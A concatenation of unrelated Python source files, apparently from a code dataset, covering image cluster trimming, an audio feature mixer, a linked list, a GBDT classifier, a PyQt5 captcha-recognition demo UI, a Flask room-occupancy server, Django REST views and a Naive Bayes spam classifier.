:param threshold: Any exterior row or column with a total less than or equal to threshold will be removed, defaults to 0.
:type threshold: int or float
:return: Returns a subset of the input array.
:rtype: numpy array
"""
print(input_arr.shape)
ul_x, ul_y = calculateTrimOffsetForward(input_arr, threshold)
lr_x, lr_y = calculateTrimOffsetBackward(input_arr, threshold)
output_arr = input_arr[ul_y:lr_y, ul_x:lr_x]
print(output_arr.shape)
return (output_arr)
def calculateTrimOffsetForward(input_arr, threshold=0):
""" This function is used to calculate the offset of the upper left corner
after trimming. The threshold should be the same as whatever is used in
trim2DArray.
:param input_arr: A 2D numpy array to be trimmed.
:type input_arr: numpy array
:param threshold: Any exterior row or column with a total less than or equal to threshold will be removed, defaults to 0.
:type threshold: int or float
:return: Returns the x and y of the upper left corner.
:rtype: int, int
"""
ul_x, ul_y = 0, 0
row_sum = np.sum(input_arr, axis=1)
col_sum = np.sum(input_arr, axis=0)
for i in range(0, len(col_sum)):
if col_sum[i] > threshold:
ul_x = i
break
for j in range(0, len(row_sum)):
if row_sum[j] > threshold:
ul_y = j
break
return (ul_x, ul_y)
def calculateTrimOffsetBackward(input_arr, threshold=0):
""" This function is used to calculate the offset of the lower right corner
after trimming. The threshold should be the same as whatever is used in
trim2DArray.
Returns the x and y of the lower right corner.
:param input_arr: A 2D numpy array to be trimmed.
:type input_arr: numpy array
:param threshold: Any exterior row or column with a total less than or equal to threshold will be removed, defaults to 0.
:type threshold: int or float
:return: Returns the x and y of the lower right corner.
:rtype: int, int
"""
y,x = input_arr.shape
lr_x, lr_y = 0, 0
row_sum = np.sum(np.flip(input_arr), axis=1)
col_sum = np.sum(np.flip(input_arr), axis=0)
for i in range(0, len(col_sum)):
if col_sum[i] > threshold:
lr_x = i
break
for j in range(0, len(row_sum)):
if row_sum[j] > threshold:
lr_y = j
break
return (x-lr_x, y-lr_y)
def testVerySmallClusters(input_img, input_mode, min_rad=7.5):
""" This functions takes a cluster as input and tests if its biggest
circle would be too small.
Returns True if it's smaller and False if it's bigger.
:param input_img: Either the filepath to the input img (input_mode='fp') or a numpy array (input_mode='np').
:type input_img: str or numpy array
:param input_mode: 'fp' if input_img is a filepath or 'np' if input_img is a numpy array.
:type input_mode: str
:param min_rad: the minimum radius for a valid cluster, defaults to 7.5
:type min_rad: int or float
:return: Returns True if the image is too small to be a valid cluster, otherwise False.
:rtype: bool
"""
if input_mode == 'fp':
np_img = loadImage(input_img)
elif input_mode == 'np':
np_img = input_img
else:
return (input_mode, " is not a supported mode. Supported modes are 'np' or 'fp'.")
dim = np_img.shape
if dim[0] <= dim[1]:
length = dim[0]
else:
length = dim[1]
if length/2. < min_rad:
return True
else:
return False
def circleMask(img, cir_x, cir_y, r, mode, filter=0):
""" Takes an img (loaded as a np array), the x and y coordinates to center
the mask, the radius of the mask, and the mode. Mode must be interior
or exterior. The default filter value is 0.
https://towardsdatascience.com/the-little-known-ogrid-function-in-numpy-19ead3bdae40
:param input_img: An image loaded as a numpy array.
:type input_img: numpy array
:param cir_x: The x coordinate of the center of the circle.
:type cir_x: int
:param cir_y: The y coordinate of the center of the circle.
:type cir_y: int
:param r: The radius of the circle mask
:param mode: Determines what is inside and outside the mask. Must be interior or exterior
:type mode: str
:type r: int
:param filter: The value for pixels outside the mask, defaults to 0.
:type filter: int or float
:return: Returns True if the image is too small to be a valid cluster, otherwise False.
:rtype: bool
"""
if not mode == 'interior' and not mode == 'exterior':
print(mode, "is not a supported mode. Please enter interior or exterior")
return 1
#get the dimensions of the image
n,m = img.shape
#create an open grid for our image
y,x = np.ogrid[0:n, 0:m]
#operate on a copy of the image
copyImg = img.copy()
#get the x and y center points of our image
center_x = cir_x
center_y = cir_y
#create a circle mask
if mode == 'interior':
circle_mask = (x-center_x)**2 + (y-center_y)**2 <= r**2
elif mode == 'exterior':
circle_mask = (x-center_x)**2 + (y-center_y)**2 >= r**2
#black out anywhere within the circle mask
copyImg[circle_mask] = [filter]
copyImg[copyImg != filter] = [255-filter]
return copyImg
def countPixels(input_img, input_mode, x, y, r):
""" Counts pixels within a radius around x, y.
:param input_img: Either the filepath to the input img (input_mode='fp') or a numpy array (input_mode='np').
:type input_img: str or numpy array
:param input_mode: 'fp' if input_img is a filepath or 'np' if input_img is a numpy array.
:type input_mode: str
:param x: The x coordinate of the center of the circle.
:type x: int
:param y: The y coordinate of the center of the circle.
:type y: int
:param r: The radius around the center of the circle
:type r: int
:return: Returns the number of pixels.
:rtype: int
"""
if input_mode == 'fp':
np_img = loadImage(input_img)
elif input_mode == 'np':
np_img = input_img
else:
return (input_mode, " is not a supported mode. Supported modes are 'np' or 'fp'.")
base_img = circleMask(np_img, x, y, r, 'exterior')
core_img = circleMask(np_img, x, y, r*0.8, 'exterior')
core_count = np.count_nonzero(base_img*core_img)
inner_img = circleMask(np_img, x, y, r*0.8, 'exterior')
inner_ring = base_img - inner_img
inner_count = np.count_nonzero(inner_ring)
outer_img = circleMask(np_img, x, y, r*1.2, 'exterior')
outer_ring = outer_img - base_img
outer_count = np.count_nonzero(outer_ring)
return (core_count, inner_count, outer_count)
# multiprocessing
def segmentationVisionQueue(q, output_dir, save_intermediate=False, overwrite=False):
""" This is a queue for multiprocessing.
:param q: the queue generated by segment Directory
:type q: Multiprocessing.Queue object
:param output_dir: the filepath to the directory where outputs will be saved.
:type output_dir: str
:param save_intermediate: Flag to save intermediate outputs to disk, defaults to False.
:type save_intermediate: bool
:param overwrite: Flag to overwrite existing outputs, defaults to False.
:type overwrite: bool
"""
while not q.empty():
try:
input_img = q.get()
print("input img: ", input_img)
# this is hard coded to run on my registered rasters only
img_info = input_img.split('/')
img_id = img_info[-1]
img_id = img_id[:-4]
output_root = output_dir + '/' + img_id
applySegmentationSteps(input_img, 'fp', output_root, save_intermediate=save_intermediate, overwrite=overwrite)
except ValueError as val_error:
print(val_error)
except Exception as error:
print(error)
def segmentDirectoryMP(input_dir, output_root, num_workers, target='.tif', save_intermediate=False, overwrite=False):
""" A multiprocessing segmenter.
:param input_dir: Filepath to the input directory.
:type input_dir: str
:param output_root: The filepath to the directory where outputs will be created.
:type output_root: str
:param num_workers: Number of workers to assign.
:type num_workers: int
:param target: The file ending for valid inputs, defaults to '.tif'
:type target: str
:param save_intermediate: Flag to save intermediate outputs to disk, defaults to False.
:type save_intermediate: bool
:param overwrite: Flag to overwrite existing outputs, defaults to False.
:type overwrite: bool
"""
q = Queue()
for i in sorted(os.listdir(input_dir)):
if i.endswith(target):
input_img = input_dir + '/' + i
q.put(input_img)
else:
continue
workers = Pool(num_workers, segmentationVisionQueue,(q, output_root, save_intermediate, overwrite))
workers.close()
workers.join()
def calculatePixelMetricsMP(input_img, input_df, num_workers=8):
""" A multiproessing pixel metrics implementation.
:param input_img: Filepath to the input img
:type input_img: str
:param input_df: Dataframe with detections
:type input_df: pandas dataframe
:param num_workers: Number of workers to assign, defaults to 8.
:type num_workers: int
:return: Returns the dataframe augmented with pixel metrics.
:rtype: pandas dataframe
"""
manager = Manager()
new_cir = manager.list()
q = Queue()
for index, row in input_df.iterrows():
plot = row['plot']
x = row['x']
y = row['y']
r = row['r']
weight = row['weight']
info = [plot, x, y, r, weight]
q.put(info)
workers = Pool(num_workers, calculatePixelMetricsQueue,(q, input_img, input_df, new_cir))
workers.close()
workers.join()
header = ['plot', 'x', 'y', 'r', 'weight', 'core', 'inner', 'outer']
print(len(new_cir))
output_df = pd.DataFrame(list(new_cir), columns=header)
return output_df
def calculatePixelMetricsQueue(q, input_img, input_df, output_list):
""" This is a queue for multiprocessing.
:param q: the queue generated by calculatePixelMetricsMP
:type q: Multiprocessing.Queue object
:param input_img: Filepath to the input img
:type input_img: str
:param input_df: Dataframe with detections
:type input_df: pandas dataframe
:param output_list: a Manager generated by calculatePixelMetricsMP
:type output_list: Multiprocessing.Manager object
"""
counter = 0
while not q.empty():
try:
if counter % 10000 == 0 and counter > 0:
print(counter)
info = q.get()
plot = info[0]
x = info[1]
y = info[2]
r = info[3]
weight = info[4]
core, inner, outer = countPixels(input_img, 'fp', x, y, r)
circle = ([plot, x, y, r, weight, core, inner, outer])
output_list.append(circle)
counter += 1
except ValueError as val_error:
print(val_error)
except Exception as error:
print(error)
|
990,979 | fdfded4f9ada0b63d584f4144c1a86027269e8f2 | import logging
from typing import Optional
import numpy as np
from lhotse.features.base import FeatureExtractor
from lhotse.utils import Decibels, NonPositiveEnergyError, Seconds, compute_num_frames
class FeatureMixer:
"""
Utility class to mix multiple feature matrices into a single one.
It should be instantiated separately for each mixing session (i.e. each ``MixedCut``
will create a separate ``FeatureMixer`` to mix its tracks).
It is initialized with a numpy array of features (typically float32)
that represents the "reference" signal for the mix.
Other signals can be mixed to it with different time offsets and SNRs using the
``add_to_mix`` method.
The time offset is relative to the start of the reference signal
(only positive values are supported).
The SNR is relative to the energy of the signal used to initialize the ``FeatureMixer``.
It relies on the ``FeatureExtractor`` to have defined ``mix`` and ``compute_energy`` methods,
so that the ``FeatureMixer`` knows how to scale and add two feature matrices together.
"""
def __init__(
self,
feature_extractor: FeatureExtractor,
base_feats: np.ndarray,
frame_shift: Seconds,
padding_value: float = -1000.0,
reference_energy: Optional[float] = None,
):
"""
FeatureMixer's constructor.
:param feature_extractor: The ``FeatureExtractor`` instance that specifies how to mix the features.
:param base_feats: The features used to initialize the ``FeatureMixer`` are a point of reference
in terms of energy and offset for all features mixed into them.
:param frame_shift: Required to correctly compute offset and padding during the mix.
:param padding_value: The value used to pad the shorter features during the mix.
This value is adequate only for log space features. For non-log space features,
e.g. energies, use either 0 or a small positive value like 1e-5.
:param reference_energy: Optionally pass a reference energy value to compute SNRs against.
This might be required when ``base_feats`` correspond to padding energies.
"""
self.feature_extractor = feature_extractor
self.tracks = [base_feats]
self.num_channels = 1 if base_feats.ndim == 2 else base_feats.shape[-1]
self.gains = []
self.frame_shift = frame_shift
self.padding_value = padding_value
self.dtype = self.tracks[0].dtype
# Keep a pre-computed energy value of the features that we initialize the Mixer with;
# it is required to compute gain ratios that satisfy SNR during the mix.
if reference_energy is None:
self.reference_energy = feature_extractor.compute_energy(base_feats)
else:
self.reference_energy = reference_energy
@property
def num_features(self):
return self.tracks[0].shape[1]
@property
def unmixed_feats(self) -> np.ndarray:
"""
Return a numpy ndarray with the shape (num_tracks, num_frames, num_features), where each track's
feature matrix is padded and scaled adequately to the offsets and SNR used in ``add_to_mix`` call.
"""
return np.stack(self.tracks)
@property
def mixed_feats(self) -> np.ndarray:
"""
Return a numpy ndarray with the shape (num_frames, num_features) - a mono mixed feature matrix
of the tracks supplied with ``add_to_mix`` calls.
"""
result = self.tracks[0]
for feats_to_add, gain in zip(self.tracks[1:], self.gains):
result = self.feature_extractor.mix(
features_a=result, features_b=feats_to_add, energy_scaling_factor_b=gain
)
return result
def _get_dummy_array(self, num_frames: int) -> np.ndarray:
return np.full(
shape=(num_frames, self.num_features)
if self.num_channels == 1
else (
num_frames,
self.num_features,
self.num_channels,
),
fill_value=self.padding_value,
dtype=self.dtype,
)
def add_to_mix(
self,
feats: np.ndarray,
sampling_rate: int,
snr: Optional[Decibels] = None,
offset: Seconds = 0.0,
):
"""
Add feature matrix of a new track into the mix.
:param feats: A 2D feature matrix to be mixed in.
:param sampling_rate: The sampling rate of ``feats``
:param snr: Signal-to-noise ratio, assuming ``feats`` represents noise (positive SNR - lower ``feats`` energy,
negative SNR - higher ``feats`` energy)
:param offset: How many seconds to shift ``feats`` in time. For mixing, the signal will be padded before
the start with low energy values.
"""
if len(feats) == 0:
return # do nothing for empty arrays
assert offset >= 0.0, "Negative offset in mixing is not supported."
assert (
self.tracks[0].ndim == feats.ndim
), f"Feature dimensions mismatch in mixing"
reference_feats = self.tracks[0]
num_frames_offset = compute_num_frames(
duration=offset, frame_shift=self.frame_shift, sampling_rate=sampling_rate
)
current_num_frames = reference_feats.shape[0]
incoming_num_frames = feats.shape[0] + num_frames_offset
mix_num_frames = max(current_num_frames, incoming_num_frames)
feats_to_add = feats
# When the existing frames are less than what we anticipate after the mix,
# we need to pad after the end of the existing features mixed so far.
if current_num_frames < mix_num_frames:
for idx in range(len(self.tracks)):
padded_track = np.vstack(
[
self.tracks[idx],
self._get_dummy_array(mix_num_frames - current_num_frames),
]
)
self.tracks[idx] = padded_track
# When there is an offset, we need to pad before the start of the features we're adding.
if offset > 0:
feats_to_add = np.vstack(
[
self._get_dummy_array(num_frames_offset),
feats_to_add,
]
)
# When the features we're mixing in are shorter that the anticipated mix length,
# we need to pad after their end.
# Note: we're doing that inefficiently, as we potentially re-allocate numpy arrays twice,
# during this padding and the offset padding before. If that's a bottleneck, we'll optimize.
if incoming_num_frames < mix_num_frames:
feats_to_add = np.vstack(
[
feats_to_add,
self._get_dummy_array(mix_num_frames - incoming_num_frames),
]
)
# When SNR is requested, find what gain is needed to satisfy the SNR
gain = 1.0
if snr is not None and self.reference_energy > 0.0:
# Compute the added signal energy before it was padded
added_feats_energy = self.feature_extractor.compute_energy(feats)
if added_feats_energy > 0.0:
target_energy = self.reference_energy * (10.0 ** (-snr / 10))
gain = target_energy / added_feats_energy
self.tracks.append(feats_to_add)
self.gains.append(gain)
|
990,980 | 48cb6f2f8d759652affadb185386e77e577d4260 | __author__ = 'SunnyYan'
class SNode:
def __init__(self,item,next):
self.item = item
self.next = next
class SLinkedList:
def __init__(self):
self.size = 0;
self.head = None
self.tail = None
def insertFront(self, item):
self.head = SNode(item, self.head)
if(self.isEmpty()):
self.tail = self.head
self.size += 1
def insertBack(self, item):
if (self.tail is None):
self.tail = SNode(item, None)
self.head = self.tail
else:
self.tail.next = SNode(item, None)
self.tail = self.tail.next
self.size += 1
def getHead(self):
return self.head
def getTail(self):
return self.tail
def isEmpty(self):
return self.size is 0
def remove(self,item):
currentNode = self.head
while(currentNode != None):
if(currentNode.item is item):
self.head = currentNode.next
elif(currentNode.next.item is item):
if(currentNode.next is self.tail):
self.tail = currentNode
currentNode.next = currentNode.next.next
currentNode = currentNode.next
def printList(self):
self.List = []
currentNode = self.head
while(currentNode != None):
self.List.append(currentNode.item)
currentNode = currentNode.next
return self.List
# Testing single linked list
# l1 = SLinkedList()
# for i in range(0,10):
# l1.insertBack(i)
#
# print "The Single LinkedList should be [0,1,2,3,4,5,6,7,8,9]: " +str(l1.printList())
#
# l2 = SLinkedList()
# for i in range(0,10):
# l2.insertFront(i)
#
# print "The Single LinkedList should be [9,8,7,6,5,4,3,2,1,0]: " +str(l2.printList())
#
# print "The head of l1 now should be 0: " + str(l1.getHead().item)
# print "The tail of l1 now should be 9: " + str(l1.getTail().item)
# print "The head of l2 now should be 9: " + str(l2.getHead().item)
# print "The tail of l2 now should be 0: " + str(l2.getTail().item)
# print "Attempting remove node 9 from l1..."
# l1.remove(9)
# print "The Single LinkedList should be [0,1,2,3,4,5,6,7,8]: " +str(l1.printList())
# print "The tail of l1 now should be 8: " + str(l1.getTail().item)
|
990,981 | 07cdfbf30ac167d438d18e6a2d74a0a97dc3f5cd | #coding=utf-8
import numpy as np
import datetime
import sklearn.ensemble
import sklearn.model_selection
import pickle
import util
class GbdtModel(object):
def __init__(self):
self.best_gbdt = None
def get_sample_weight(self, target_values):
pos_sample_num = target_values.sum()
neg_sample_num = len(target_values) - pos_sample_num
pos_sample_weight = float(neg_sample_num) / len(target_values)
neg_sample_weight = float(pos_sample_num) / len(target_values)
sample_weight = np.zeros(shape = len(target_values))
sample_weight[target_values == 1] = pos_sample_weight
sample_weight[target_values == 0] = neg_sample_weight
return sample_weight
def fit_for_best_gbdt(self, feature_values, target_values):
gbdt = sklearn.ensemble.GradientBoostingClassifier(max_features = "auto")
model_params = {"n_estimators" : [300, 500, 600, 800], "max_depth" : [3], "learning_rate" : [0.1, 0.01, 0.05], "subsample" : [0.3, 0.5, 0.7]}
fit_params = {"sample_weight" : self.get_sample_weight(target_values)}
gs = sklearn.model_selection.GridSearchCV(estimator = gbdt,
param_grid = model_params,
fit_params = fit_params,
n_jobs = 3,
cv = 5,
scoring = util.ks_scorer,
verbose = 10)
now = datetime.datetime.now()
print ("grid search begins: %s" % str(now))
gs.fit(feature_values, target_values)
now = datetime.datetime.now()
print ("grid search finished: %s" % str(now))
print ("best params : %s" % str(gs.best_params_))
print ("best score : %s" % str(gs.best_score_))
self.best_gbdt = gs.best_estimator_
f = open("gbdt_cls.pkl", "wb")
pickle.dump(self.best_gbdt, f)
f.close()
def fit(self, feature_values, target_values):
self.fit_for_best_gbdt(feature_values, target_values)
def predict(self, feature_values):
assert self.best_gbdt is not None, "fit model first"
return self.best_gbdt.predict(feature_values)
def predict_proba(self, feature_values):
assert self.best_gbdt is not None, "fit model first"
return self.best_gbdt.predict_proba(feature_values)[:, 1]
def get_base_estimator(self):
return self.best_gbdt
def get_model_detail(self):
assert self.best_gbdt is not None, "fit model first"
params = self.best_gbdt.get_params()
detail = dict()
detail["model_name"] = "GBDT"
detail["n_estimators"] = params["n_estimators"]
detail["max_depth"] = params["max_depth"]
detail["learning_rate"] = params["learning_rate"]
detail["subsample"] = params["subsample"]
return detail |
990,982 | 52315178e81c9bba570f6fe4e945d5e701d63f05 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'gui2.ui'
#
# Created by: PyQt5 UI code generator 5.12.1
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(570, 489)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.gridLayout = QtWidgets.QGridLayout(self.centralwidget)
self.gridLayout.setObjectName("gridLayout")
self.verticalLayout = QtWidgets.QVBoxLayout()
self.verticalLayout.setSizeConstraint(QtWidgets.QLayout.SetDefaultConstraint)
self.verticalLayout.setContentsMargins(50, 20, 50, 20)
self.verticalLayout.setSpacing(20)
self.verticalLayout.setObjectName("verticalLayout")
self.label = QtWidgets.QLabel(self.centralwidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label.sizePolicy().hasHeightForWidth())
self.label.setSizePolicy(sizePolicy)
self.label.setMinimumSize(QtCore.QSize(0, 100))
self.label.setObjectName("label")
self.verticalLayout.addWidget(self.label)
self.horizontalLayout = QtWidgets.QHBoxLayout()
self.horizontalLayout.setObjectName("horizontalLayout")
self.little1 = QtWidgets.QLabel(self.centralwidget)
self.little1.setObjectName("little1")
self.horizontalLayout.addWidget(self.little1)
self.little2 = QtWidgets.QLabel(self.centralwidget)
self.little2.setObjectName("little2")
self.horizontalLayout.addWidget(self.little2)
self.little3 = QtWidgets.QLabel(self.centralwidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Minimum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.little3.sizePolicy().hasHeightForWidth())
self.little3.setSizePolicy(sizePolicy)
self.little3.setMinimumSize(QtCore.QSize(0, 100))
self.little3.setObjectName("little3")
self.horizontalLayout.addWidget(self.little3)
self.little4 = QtWidgets.QLabel(self.centralwidget)
self.little4.setObjectName("little4")
self.horizontalLayout.addWidget(self.little4)
self.little5 = QtWidgets.QLabel(self.centralwidget)
self.little5.setObjectName("little5")
self.horizontalLayout.addWidget(self.little5)
self.verticalLayout.addLayout(self.horizontalLayout)
self.result = QtWidgets.QTextBrowser(self.centralwidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.result.sizePolicy().hasHeightForWidth())
self.result.setSizePolicy(sizePolicy)
self.result.setMinimumSize(QtCore.QSize(0, 100))
font = QtGui.QFont()
font.setFamily("微软雅黑")
font.setPointSize(14)
font.setBold(False)
font.setWeight(50)
self.result.setFont(font)
self.result.setObjectName("result")
self.verticalLayout.addWidget(self.result)
self.gridLayout.addLayout(self.verticalLayout, 0, 1, 1, 1)
self.verticalLayout_2 = QtWidgets.QVBoxLayout()
self.verticalLayout_2.setContentsMargins(-1, -1, 20, -1)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.pushButton_1 = QtWidgets.QPushButton(self.centralwidget)
self.pushButton_1.setAutoFillBackground(False)
self.pushButton_1.setObjectName("pushButton_1")
self.verticalLayout_2.addWidget(self.pushButton_1)
self.pushButton_2 = QtWidgets.QPushButton(self.centralwidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.pushButton_2.sizePolicy().hasHeightForWidth())
self.pushButton_2.setSizePolicy(sizePolicy)
self.pushButton_2.setAutoFillBackground(False)
self.pushButton_2.setObjectName("pushButton_2")
self.verticalLayout_2.addWidget(self.pushButton_2)
self.pushButton_3 = QtWidgets.QPushButton(self.centralwidget)
self.pushButton_3.setAutoFillBackground(False)
self.pushButton_3.setObjectName("pushButton_3")
self.verticalLayout_2.addWidget(self.pushButton_3)
self.pushButton_4 = QtWidgets.QPushButton(self.centralwidget)
self.pushButton_4.setAutoFillBackground(False)
self.pushButton_4.setObjectName("pushButton_4")
self.verticalLayout_2.addWidget(self.pushButton_4)
self.pushButton_5 = QtWidgets.QPushButton(self.centralwidget)
self.pushButton_5.setAutoFillBackground(False)
self.pushButton_5.setObjectName("pushButton_5")
self.verticalLayout_2.addWidget(self.pushButton_5)
self.pushButton_6 = QtWidgets.QPushButton(self.centralwidget)
self.pushButton_6.setAutoFillBackground(False)
self.pushButton_6.setObjectName("pushButton_6")
self.verticalLayout_2.addWidget(self.pushButton_6)
self.gridLayout.addLayout(self.verticalLayout_2, 0, 0, 1, 1)
self.gridLayout.setColumnStretch(0, 1)
self.gridLayout.setColumnStretch(1, 3)
MainWindow.setCentralWidget(self.centralwidget)
self.retranslateUi(MainWindow)
self.pushButton_1.clicked.connect(MainWindow.browseFile)
self.pushButton_2.clicked.connect(MainWindow.grayImage)
self.pushButton_3.clicked.connect(MainWindow.binaryImage)
self.pushButton_4.clicked.connect(MainWindow.denoiseImage)
self.pushButton_5.clicked.connect(MainWindow.eroseDilateImage)
self.pushButton_6.clicked.connect(MainWindow.cutChars)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "验证码识别模拟"))
self.label.setText(_translate("MainWindow", " Picture"))
self.little1.setText(_translate("MainWindow", "little1"))
self.little2.setText(_translate("MainWindow", "little2"))
self.little3.setText(_translate("MainWindow", "little3"))
self.little4.setText(_translate("MainWindow", "little4"))
self.little5.setText(_translate("MainWindow", "little5"))
self.pushButton_1.setText(_translate("MainWindow", "选择文件"))
self.pushButton_2.setText(_translate("MainWindow", "灰度化"))
self.pushButton_3.setText(_translate("MainWindow", "二值化"))
self.pushButton_4.setText(_translate("MainWindow", "去噪"))
self.pushButton_5.setText(_translate("MainWindow", "腐蚀和膨胀"))
self.pushButton_6.setText(_translate("MainWindow", "分割识别"))
|
990,983 | c95a45b24848b7b034f8ef16b61deb2c5874ccc0 | '''
Created on Oct 28, 2016
@author: Bogdan Boboc (bogdanboboc97@gmail.com) && Florin Tamas (tamasflorin@live.com)
'''
from flask import Flask, request, jsonify
import cv2
import numpy as np
app = Flask(__name__)
rooms_hash = {}
persons_count_hash = {}
humidity_hash = {}
temperature_hash = {}
def get_number_of_persons(image_path):
hog = cv2.HOGDescriptor()
hog.setSVMDetector(cv2.HOGDescriptor_getDefaultPeopleDetector())
capture = cv2.imread(image_path)
found,w = hog.detectMultiScale(capture,winStride=(8,8),padding=(32,32),scale=1.05)
return len(found)
@app.route("/update_movement", methods = ["POST"])
def update_movement():
global rooms_hash
content = request.get_json(silent = True)
response = {}
try:
rooms_hash[ content["name"] ] = content["status"]
humidity_hash[ content["name"] ] = content["humidity"]
temperature_hash[ content["name"] ] = content["temperature"]
save_image(content["name"], str(content["image"]).decode('base64'))
result = get_number_of_persons(content["name"] + ".jpeg")
update_persons_count(content["name"], result)
response = { "status" : "ok" }
except:
response = { "status" : "invalid data" }
return jsonify(response)
def update_persons_count(room, count):
global persons_count_hash
if room not in persons_count_hash.keys():
persons_count_hash[room] = []
if len(persons_count_hash[room]) >= 6:
persons_count_hash[room] = persons_count_hash[room][1:]
persons_count_hash[room].append(count)
@app.route("/get_movement", methods = ["GET"])
def get_movement():
global rooms_hash
return get_rooms_CSV()
@app.route("/get_movement_json", methods = ["GET"])
def get_movement_json():
global rooms_hash
return get_rooms_JSON()
@app.route("/get_room_status", methods = ["GET", "POST"])
def get_room_status():
global rooms_hash
try:
room_name = request.args.get("name")
if room_name in rooms_hash.keys():
return jsonify( { "status" : "" + rooms_hash[ room_name ] , "count" : get_persons_count(room_name), "humidity" : humidity_hash[room_name], "temperature" : temperature_hash[room_name] } )
except:
return jsonify( { "status" : "Bad format!" })
return jsonify( { "status" : "Room inexistent!"} )
def get_rooms_JSON():
global rooms_hash
rooms_json = []
for room_name in rooms_hash:
rooms_json.append( { "name" : room_name, "status" : rooms_hash[ room_name ], "count" : get_persons_count(room_name), "humidity" : humidity_hash[room_name], "temperature" : temperature_hash[room_name] } )
return jsonify(rooms_json)
def get_persons_count(room_name):
global persons_count_hash
sum = 0
for count in persons_count_hash[room_name]:
sum += count
return str( int( round(sum / 6) ) )
def get_rooms_CSV():
global rooms_hash
rooms_CSV = ""
for key in rooms_hash:
rooms_CSV += key
rooms_CSV += ","
rooms_CSV += rooms_hash[ key ]
rooms_CSV += ","
rooms_CSV += get_persons_count(key)
rooms_CSV += ","
rooms_CSV += humidity_hash[ key ]
rooms_CSV += ","
rooms_CSV += temperature_hash[ key ]
rooms_CSV += ";"
return rooms_CSV
def save_image(room_name, str_image):
photo_file_name = room_name + ".jpeg"
file = open(photo_file_name, "wb")
file.write(str_image)
file.close()
if __name__ == "__main__":
app.run(host='0.0.0.0',threaded=True)
|
990,984 | ada9f195c9c727cb37c59ab355c608621256ad73 | from rest_framework.viewsets import ModelViewSet
from rest_framework.generics import ListAPIView
from goods.models import SpecificationOption, SPUSpecification
from meiduo_admin.serializers.option import OptionSerializer, OptionSpecificationSerializer
from meiduo_admin.utils import PageNum
class OptionModelViewSet(ModelViewSet):
serializer_class = OptionSerializer
queryset = SpecificationOption.objects.all()
pagination_class = PageNum
class OptionListAPIView(ListAPIView):
serializer_class = OptionSpecificationSerializer
queryset = SPUSpecification.objects.all()
|
990,985 | de292693bdda103f60160877967d1ee62e2043a0 | # -*- coding: utf-8 -*-
"""
Created on Sat May 26 18:19:58 2018
@author: Harini Gowdagere Tulasidas
PSU ID: 950961342
@Course : CS 545- Machine Learning
Programming Assignment2: Gaussian Naïve Bayes and Logistic Regression to classify
the Spambase data from the UCI ML repository
"""
from __future__ import division
import numpy as np
import pandas as pd
from sklearn.metrics import confusion_matrix as cm
from sklearn.metrics import recall_score as recall
from sklearn.metrics import accuracy_score
from sklearn.metrics import precision_score
""" This method splits the dataset such that the test and train data has 2300 instances each
the there are 40% spam and 60% no spam instances."""
def test_train_split():
filename = "/Users/harinirahul/Desktop/CS - 545 - ML/PA2/spambase/spambase.data"
dataset = np.array(pd.read_csv(filename))
temp = np.split(dataset, np.where(np.diff(dataset[:,-1]))[0]+1)
spam = temp[0]
no_spam = temp[1]
np.random.shuffle(spam)
np.random.shuffle(no_spam)
spam_size = int((len(spam)/2))
no_spam_size = int((len(no_spam)/2))
train_data = np.concatenate((spam[: spam_size, :],no_spam[:no_spam_size,:]), axis =0)
test_data = np.concatenate((spam[spam_size: , :],no_spam[no_spam_size:,:]), axis =0)
train_labels = train_data[:,-1]
train_labels = train_labels.reshape((len(train_labels),1))
test_labels = test_data[:,-1]
test_labels = test_labels.reshape((len(test_labels),1))
return train_data,train_labels,test_data,test_labels
"""This is a utility method that computes mean and standard deviation for the features.
It also replaces the Standard deviation with minimum value of 0.0001 when it is 0. This is done
to avoid the errors while computing the log """
def mean_and_sd(data):
x_mean = np.array(np.mean(data , axis = 0))
x_std = np.array(np.std(data , axis = 0))
x_std[x_std == 0.0] = 0.0001
return x_mean.reshape((len(x_mean),1)) ,x_std.reshape((len(x_std),1))
"""
This method is used to calculate the prior probabilities for both the spam and Non spam classes.
"""
def calculate_probabilities(dataset):
no_spam_count = 0
spam_count = 0
no_spam = []
spam = []
for row in dataset:
if row[-1]==1:
spam_count+=1
spam.append(row)
else:
no_spam_count+=1
no_spam.append(row)
no_spam_prior = float(no_spam_count/len(dataset))
spam_prior = float(spam_count/len(dataset))
print("prior Probability of the spam class: " ,spam_prior , "\n Prior probability of Non Spam class :", no_spam_prior)
log_spam_prior = np.log(spam_prior)
log_no_spam_prior = np.log(no_spam_prior)
spam = np.array(spam)
no_spam = np.array(no_spam)
spam_x_mean , spam_x_std = mean_and_sd(spam[: , :57])
no_spam_x_mean , no_spam_x_std = mean_and_sd(no_spam[:,:57])
return log_spam_prior , log_no_spam_prior , spam_x_mean , spam_x_std,no_spam_x_mean , no_spam_x_std
""" This method is used to compute the probabilities for the Gaussian Naive Bayes algorithm
and classifies the instance as spam and non spam """
def gaussian_naive_bayes_classifier(log_spam_prior , log_no_spam_prior , spam_x_mean , spam_x_std ,no_spam_x_mean , no_spam_x_std,row):
